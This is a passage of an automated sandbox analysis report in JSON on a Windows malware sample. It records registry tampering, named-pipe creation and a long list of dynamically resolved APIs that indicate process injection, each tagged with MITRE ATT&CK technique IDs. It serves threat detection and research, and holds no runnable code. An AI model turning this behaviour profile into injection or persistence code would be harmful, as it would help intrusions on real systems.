\"HKCU\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" touched \"Sticky Notes Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\\SHELLFOLDER\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 754E0000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcryptprimitives.dll\" at 750A0000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-138", "type": 6, "relevance": 3, "name": "Calls an API typically used to create an instance of a named pipe", "description": "\"svchost.exe\" called \"NtCreateNamedPipeFile\" with parameter \"pipe\\uqyipjlp\" - (UID: 00000000-00003660)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter _allmul (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter SHGetInstanceExplorer (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter OleInitialize (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockShared (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockShared (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter InitCommonControlsEx (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00006024)\n 